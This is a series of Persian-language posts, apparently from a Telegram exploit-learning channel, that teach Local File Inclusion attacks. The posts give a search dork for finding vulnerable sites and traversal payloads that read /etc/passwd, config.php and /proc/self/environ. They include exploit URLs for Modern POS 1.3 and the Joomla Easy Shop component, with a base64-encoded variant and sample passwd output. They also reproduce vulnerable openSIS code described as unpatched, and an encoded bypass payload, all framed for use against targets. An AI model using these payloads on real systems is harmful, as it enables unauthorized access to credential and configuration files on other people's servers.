اموزش باگ LFI
< #LFI #Bug #Learning with #Dork > 2018
=-=-=-=-=-=
T.me/LearnExploit
0Day.Today

اموزش باگ LFI
< #LFI #Bug #Learning with #Dork > 2018
=-=-=-=-=-=
#Dork :
~# intext:"by Lenule44ka"

#Exploit :
~# =../../../../../../../../../../etc/passwd
بعد از
index.php?pages=
رو پاک کنید و اکسپلویت رو قرار بدید :)
=-=-=-=-=-=
T.me/LearnExploit
0Day.Today

#Arbitrary #File #Download #LFI #RFI #Modern_POS v1.3
—————————————————--
اسیب پذیری فایل دانلود در Modern POS 1.3
=================================
نحوه ی اسکپلویت کردن :::
http://localhost/[PATH]/_inc/bridges/php-local/index.php?action=download&path=[FILE]
///———————
http://localhost/[PATH]/
این قسمت دامین شما یا تارکت میباشد.

_inc/bridges/php-local/index.php?action=download&path=
با اضافه کردن این قسمت به اخر دامین به محل اسیب پذیری دسترسی پیدا میکنید.

[FILE]
در این قسمت دستورات مربوط به RFI or LFI رو وارد کنید مانند :::

_inc/bridges/php-local/index.php?action=download&path=../../../config.php

_inc/bridges/php-local/index.php?action=download&path=../../../../../../../../proc/self/environ
======================
لینک برنامه :
Program
(https://codecanyon.net/item/modern-pos-point-of-sale-with-stock-management-system/22702683)
لینک اکسپلویت ثبت شده :
Exploit
(https://www.exploit-db.com/exploits/46137)
======================
@ t.me/LearnExploit
@ IR0Day.Today Boy's (https://t.me/learnexploit)

💠🌐🌀
🔰⚜️
💢
#Joomla (Joomla!) #Component #EasyShop (Easy Shop) v 1.2.3 #LFI Local File Inclusion #Vulnerable
➖➖➖➖➖➖➖➖
آسیب پذیری LFI در کامپوننته Easy Shop جوملا :
#~Exploit Title :
Joomla! Component Easy Shop 1.2.3 - Local File Inclusion
〰〰〰〰
#~Path :
آدرسی باگ :
http://localhost/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=‍‍‍
〰〰〰〰
#~Exploit :
نحوه ی اکسپلویت :
== > برای اینکه اکسپلویت اجرا بشه باید دستورات رو بصورت کاراکتر های Base64 انکود کنید و به اخر url اضافه کنید
مانند :
‍`/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA=`

اگر قسمت انکود شده را دیکود کنیم برابر با عبارت زیر میشود :
../../configuration.php

بخشی از پاسخی که سایت برای ما برمیگردونه :
‍`root:x:0:0:root:/root:/bin/bash`
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
〰〰〰〰
برای اینکه بتوانید دستورات خودتون را انکود کنید بهترین راه استفاده از BurpSuite است.(در تب Decoder )
〰〰〰〰
Software Link
➖➖➖➖➖➖➖➖
⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's

#LFI #vulnerabilities #OpenSIS #Webapp
#Local_File_Inclusion #Versian 7.4 <<
➖➖➖➖➖➖➖➖➖➖➖➖
اسیب پذیری LFI در سیستم OenSIS ورژن 7.4 و پایین‌تر
بررسی اسیب پذیری در پست بعدی.
➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army

#LFI #vulnerabilities #OpenSIS #Webapp #Local_File_Inclusion
➖➖➖➖➖➖➖➖➖➖➖➖
اسیب پذیری LFI در OpenSIS (ورژن ۷.۴ و پایینتر) :
[-]Title~#:
openSIS <= 7.4 (Bottom.php) Local File Inclusion Vulnerability
➖➖➖➖➖➖➖➖
[-] Software Link:
https://opensis.com/
➖➖➖➖➖➖➖➖
[-] Affected Versions:
باگ در ورژن 7.4 و ورژن های پایینتر موجود است.
➖➖➖➖➖➖➖➖
[-] Vulnerability Description:
باگ در فایل Bottom.php می باشد.
قسمتی اسیب پذیر فایل:

36. if(clean_param($_REQUEST['modfunc'],PARAM_ALPHA)=='print')

37. {

38.    $_REQUEST = $_SESSION['_REQUEST_vars'];

39.    $_REQUEST['_openSIS_PDF'] = true;

40.    if(strpos($_REQUEST['modname'],'?')!==false)

41.      $modname =

substr($_REQUEST['modname'],0,strpos($_REQUEST['modname'],'?'));

42.    else

43.      $modname = $_REQUEST['modname'];

44.    ob_start();

45.    include('modules/'.$modname);

ملاحظه می کنید که در خط ۴۳ مقدار از کاربر گرفته می شود ولی در خط ۴۵ بدون هیچ محدودیتی اجرا میشود.
هنوز هیچ اپدیتی برای این اسیب پذیری نیومده.
➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army

Bypasses for LFI, Auth bypass

#bypass #LFI
——————
0Day.Today
@LearnExploit
@Tech_Army

MyBB 1.8.32 - Chained LFI Remote Code Execution (RCE)

Github

#LFI #RCE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army

LFI Payload⚡️

Payload: 

".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

#LFI #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army